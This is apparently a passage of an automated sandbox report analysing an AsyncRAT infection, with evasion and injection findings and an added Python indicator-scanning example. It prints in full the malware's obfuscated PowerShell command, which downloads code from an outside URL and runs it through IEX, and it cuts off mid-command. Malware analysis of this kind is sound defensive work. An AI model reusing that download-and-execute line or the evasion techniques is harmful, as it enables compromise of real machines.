Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (27 identical entries)
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (3 identical entries)
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (90 identical entries)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX (14 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX (73 identical entries)

Malware Analysis System Evasion:

Yara detected AsyncRAT
Source: Yara match File source: 27.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000002.886169058.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.888448368.0000000003161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5644, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: RegAsm.exe, 0000001B.00000002.886169058.0000000000402000.00000040.00000001.sdmp Binary or memory string: SBIEDLL.DLL
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6800 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7144 Thread sleep count: 5308 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7140 Thread sleep count: 3288 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5956 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6344 Thread sleep count: 2744 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6336 Thread sleep count: 687 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6576 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3272 Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5996 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1724 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2680 Thread sleep count: 3027 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2680 Thread sleep count: 6385 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vfl4qio1\vfl4qio1.dll
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3322
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6077
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5308
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3288
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2744
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 687
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3441
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5943
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 3027
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 6385
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File Volume queried: C:\ FullSizeInformation
Source: RegAsm.exe, 0000001B.00000002.886169058.0000000000402000.00000040.00000001.sdmp Binary or memory string: vmware
Source: wscript.exe, 00000000.00000002.361896180.0000025E2AACA000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}K
Source: RegAsm.exe, 0000001B.00000003.496362312.0000000005663000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWs
Source: powershell.exe, 00000002.00000002.455319022.000001F46A687000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlllt.he
Source: RegAsm.exe, 0000001B.00000003.505247558.0000000005671000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000011.00000002.475746881.000001CBC2723000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\M8"
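The memory strings listed above are not all of the same weight. The SBIEDLL.DLL string sits in the RegAsm.exe region at 0x402000, which is the unpacked AsyncRAT image that powershell.exe wrote into RegAsm.exe, so it reflects a check coded into the sample (Sandboxie injects that DLL into every sandboxed process). The VMware device-instance path and the "Hyper-V RAW" string, by contrast, turn up in wscript.exe and powershell.exe memory; those are names the guest OS itself hands to any process that enumerates device interfaces or the Winsock provider catalog, and they appear in benign processes on the same host just as readily. The following Python snippet is an added example, not part of this report, of how an analyst would re-run such a string sweep over a memory dump: it searches each indicator both as 8-bit text and as UTF-16LE (the encoding .NET uses for string literals, which a plain ASCII grep misses), and tags each hit with the attribution described above. SAMPLE_DUMP is a constructed byte blob, and the sample-versus-host labels in INDICATORS are this example's reading of the report, not a classification the report itself makes.

```python
import re

# Indicator strings the report found in process memory. The "origin" label is
# this example's attribution: "sample" means the string belongs to the injected
# AsyncRAT image; "host" means the analysis VM exposes it to every process.
INDICATORS = {
    "SBIEDLL.DLL":  ("Sandboxie hook DLL name (anti-sandbox check)", "sample"),
    "vmware":       ("VMware vendor string in a device path", "host"),
    "Ven_NECVMWar": ("VMware virtual CD-ROM device instance path", "host"),
    "Hyper-V RAW":  ("Hyper-V socket Winsock provider name", "host"),
}

# Constructed dump: a .NET string literal (UTF-16LE, as in the RegAsm.exe region),
# then a device path and a provider name as 8-bit text, separated by zero padding.
SAMPLE_DUMP = (
    b"\x00" * 16
    + "SbieDll.dll".encode("utf-16-le")
    + b"\x00" * 8
    + b"\\??\\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#"
    + b"\x00" * 8
    + b"Hyper-V RAW"
)


def find_indicators(blob, indicators=INDICATORS):
    """Return sorted (offset, encoding, indicator, origin) hits.

    Every needle is matched case-insensitively both as 8-bit text and as
    UTF-16LE, because .NET keeps its literals in UTF-16 and an ASCII-only
    sweep would miss the SBIEDLL.DLL check entirely."""
    hits = []
    for needle, (_, origin) in indicators.items():
        forms = (("ascii", needle.encode("ascii")), ("utf-16le", needle.encode("utf-16-le")))
        for enc, raw in forms:
            for m in re.finditer(re.escape(raw), blob, re.IGNORECASE):
                hits.append((m.start(), enc, needle, origin))
    return sorted(hits)


def summarize(hits):
    """Group the matched indicator names by attribution, e.g. {"sample": {...}, "host": {...}}."""
    summary = {}
    for _, _, needle, origin in hits:
        summary.setdefault(origin, set()).add(needle)
    return summary
```

Only a hit in the "sample" group supports the "tries to detect sandboxes" verdict; a dump that yields nothing but "host" strings says more about the analysis VM than about the malware.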

Anti Debugging:

Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Yara detected Powershell download and execute
Source: Yara match File source: amsi64_6616.amsi.csv, type: OTHER
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 410000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: EE5008
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\vfl4qio1\vfl4qio1.0.cs
Bypasses PowerShell execution policy
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\run.ps1
Injects a PE file into a foreign processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Command $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary);$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters;$CompilerParametres.ReferencedAssemblies.Add('System.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Management.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Windows.Forms.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.IncludeDebugInformation = $false;$CompilerParametres.GenerateExecutable = $false;$CompilerParametres.GenerateInMemory = $true;$c1='(New-';[System.Threading.Thread]::Sleep(1000);$X1 = '!!!!!!!!!!!! '.Replace('!!!!!!!!!!!!','Object');[System.Threading.Thread]::Sleep(1000);$X2 = 'Net';[System.Threading.Thread]::Sleep(1000);$X3 = '.We';[System.Threading.Thread]::Sleep(1000);$c4='.Downlo';[System.Threading.Thread]::Sleep(1000);$D1 = 'bClient)';[System.Threading.Thread]::Sleep(1000);$c3='adString(''h'+'t'+'t'+'p'+'s:/'+'/c'+'h'+'i'+'lp'+'.i'+'t'+'/7'+'8'+'54'+'6'+'1'+'0'')';[System.Threading.Thread]::Sleep(1000);$alosh = $c1,$X1,$X2,$X3,$D1,$c4,$c3;[System.Threading.Thread]::Sleep(1000);$hcnx = 'I`E`X';[System.Threading.Thread]::Sleep(1000);$zzzzzzzzzzzzzzzzzzzzzzzzzzzzz= $hcnx+($alosh -Join '')|I`E`X
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Command $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary);$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters;$CompilerParametres.ReferencedAssemblies.Add('System.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Management.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Windows.Forms.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.IncludeDebugInformation = $false;$CompilerParametres.GenerateExecutable = $false;$CompilerParametres.GenerateInMemory = $true;$c1='(New-';[System.Threading.Thread]::Sleep(1000);$X1 = '!!!!!!!!!!!! '.Replace('!!!!!!!!!!!!','Object');[System.Threading.Thread]::Sleep(1000);$X2 = 'Net';[System.Threading.Thread]::Sleep(1000);$X3 = '.We';[System.Threading.Thread]::Sleep(1000);$c4='.Downlo';[System.Threading.Thread]::Sleep(1000);$D1 = 